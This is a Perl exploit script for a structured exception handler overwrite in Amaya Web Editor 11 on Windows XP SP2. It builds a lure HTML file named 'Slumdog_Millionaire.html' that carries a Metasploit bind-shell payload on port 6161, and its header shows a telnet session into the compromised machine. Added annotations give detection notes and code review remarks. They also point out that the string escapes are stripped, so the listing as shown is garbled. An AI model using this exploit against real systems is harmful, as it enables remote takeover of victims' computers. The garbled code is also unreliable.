# Title : Amaya Web Editor 11 Remote SEH Overwrite Exploit
# Published : 2009-01-30
# Author : LiquidWorm
#!/usr/bin/perl
#
# Title: Amaya Web Editor 11 Remote SEH Overwrite Exploit
#
# Summary: Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web.
#
# Product web page: http://www.w3.org/Amaya/
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Reference: http://www.milw0rm.com/exploits/7906
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail [w00t] com
#
# 30.01.2009
#
#------------------------------------------------------------------
#
# lqwrm@zeroscience:~$ telnet 192.168.1.101 6161
# Trying 192.168.1.101...
# Connected to 192.168.1.101.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Amaya\WindowsWX\bin>dir
# Volume in drive C is System
# Volume Serial Number is D484-8540
#
# Directory of C:\Program Files\Amaya\WindowsWX\bin
#
# 29.01.2009 19:27 <DIR> .
# 29.01.2009 19:27 <DIR> ..
# 16.12.2008 14:44 5.816.320 amaya.exe
# 16.12.2008 14:41 1.290.240 thotprinter.dll
# 19.08.2008 11:02 135.168 wxbase28u_net_vc_custom.dll
# 19.08.2008 11:01 1.220.608 wxbase28u_vc_custom.dll
# 19.08.2008 11:02 135.168 wxbase28u_xml_vc_custom.dll
# 19.08.2008 11:03 741.376 wxmsw28u_adv_vc_custom.dll
# 19.08.2008 11:03 286.720 wxmsw28u_aui_vc_custom.dll
# 19.08.2008 11:01 3.018.752 wxmsw28u_core_vc_custom.dll
# 19.08.2008 11:02 49.152 wxmsw28u_gl_vc_custom.dll
# 19.08.2008 11:02 524.288 wxmsw28u_html_vc_custom.dll
# 19.08.2008 11:03 593.920 wxmsw28u_xrc_vc_custom.dll
# 11 File(s) 13.811.712 bytes
# 2 Dir(s) 7.520.141.312 bytes free
#
# C:\Program Files\Amaya\WindowsWX\bin>
#
#------------------------------------------------------------------
# Builds one crafted HTML document on disk and nothing else: there is no
# network code here, the document has to be opened in the vulnerable editor.
# The over-long value is carried by the dir attribute of a <bdo> element.
#
# Defender notes:
#   * Detection (file): an HTML document whose dir="..." attribute value is
#     roughly 10.5 KB of a single repeated character followed by non-printable
#     data is the signature of this trigger; legitimate dir values are the
#     short keywords ltr / rtl / auto.
#   * Detection (host): per the header transcript, a successful trigger leaves
#     a listener on TCP 6161 on the workstation that opened the file.
#   * The handler/trampoline addresses below are hard-coded kernel32.dll
#     offsets for the tested XP SP2 (English) build, so the trigger is tied
#     to that exact module layout.
#   * Code quality: no `use strict`/`use warnings`; `$payload` is an
#     undeclared package global; the output file is opened with a bareword
#     handle and two-arg open (see the NOTE at the open call).
#
# NOTE(review): as rendered on this page the string literals carry no
# backslash escape sequences ("n", "x41", ...), so the listing as shown writes
# those literal ASCII characters rather than the newline/byte values its
# comments describe -- this looks like extraction garbling of the original.
my $start = "<html>" . "n" . '<bdo dir="' . "n";
# Filler up to the SEH record; the length is specific to the tested build.
my $junk = "x41" x 10556;
my $seh = "xc5x87x85x7c"; #0x7c8587c5 pop pop ret kernel32.dll - (SE handler) - EIP
# Alternative addresses the author noted for the same module (unused here).
#0x7c941eed jmp esp kernel32.dll
#0x7c836960 call esp kernel32.dll
#0x7c85d568 call esp kernel32.dll
# ...
my $next_seh = "xebx06x90x90"; #0x909006eb jmp+0x06 - (Pointer to next SEH record)
my $nop = "x90" x 50;
# Payload: a Metasploit win32_bind stub (bind shell on port 6161, 344 bytes,
# PexFnstenvSub-encoded) as stated by the generator line below.
# win32_bind - EXITFUNC=seh LPORT=6161 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $sc = "x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xb0".
"x6bx3ax1ex83xebxfcxe2xf4x4cx01xd1x53x58x92xc5xe1".
"x4fx0bxb1x72x94x4fxb1x5bx8cxe0x46x1bxc8x6axd5x95".
"xffx73xb1x41x90x6axd1x57x3bx5fxb1x1fx5ex5axfax87".
"x1cxefxfax6axb7xaaxf0x13xb1xa9xd1xeax8bx3fx1ex36".
"xc5x8exb1x41x94x6axd1x78x3bx67x71x95xefx77x3bxf5".
"xb3x47xb1x97xdcx4fx26x7fx73x5axe1x7ax3bx28x0ax95".
"xf0x67xb1x6exacxc6xb1x5exb8x35x52x90xfex65xd6x4e".
"x4fxbdx5cx4dxd6x03x09x2cxd8x1cx49x2cxefx3fxc5xce".
"xd8xa0xd7xe2x8bx3bxc5xc8xefxe2xdfx78x31x86x32x1c".
"xe5x01x38xe1x60x03xe3x17x45xc6x6dxe1x66x38x69x4d".
"xe3x38x79x4dxf3x38xc5xcexd6x03x22x0fxd6x38xb3xff".
"x25x03x9ex04xc0xacx6dxe1x66x01x2ax4fxe5x94xeax76".
"x14xc6x14xf7xe7x94xecx4dxe5x94xeax76x55x22xbcx57".
"xe7x94xecx4exe4x3fx6fxe1x60xf8x52xf9xc9xadx43x49".
"x4fxbdx6fxe1x60x0dx50x7axd6x03x59x73x39x8ex50x4e".
"xe9x42xf6x97x57x01x7ex97x52x5axfaxedx1ax95x78x33".
"x4ex29x16x8dx3dx11x02xb5x1bxc0x52x6cx4exd8x2cxe1".
"xc5x2fxc5xc8xebx3cx68x4fxe1x3ax50x1fxe1x3ax6fx4f".
"x4fxbbx52xb3x69x6exf4x4dx4fxbdx50xe1x4fx5cxc5xce".
"x3bx3cxc6x9dx74x0fxc5xc8xe2x94xeax76x40xe1x3ex41".
"xe3x94xecxe1x60x6bx3ax1e";
# Closes the attribute and the document so the file still parses as HTML.
my $end = '">' . "n" . "t00t</bdo>" . "n" . "</html>";
my $file= "Slumdog_Millionaire.html";
# Classic SEH-overwrite layout: filler, next-SEH pointer, handler address,
# NOP slide, payload. `$payload` is not declared with `my`.
$payload = "$start" . "$junk" . "$next_seh" . "$seh" . "$nop" . "$sc " . "$end";
# NOTE(review): bareword handle and two-arg open -- the mode lives inside the
# second argument, so a filename beginning with a mode character would change
# the open mode; three-arg `open my $fh, '>', "./$file"` is the safe form.
open (exploit, ">./$file") or die "Can't open $file: $!";
print exploit "$payload";
# Return value of close is not checked; buffered write errors would go unseen.
close (exploit);
print "tn - $file successfully created!n";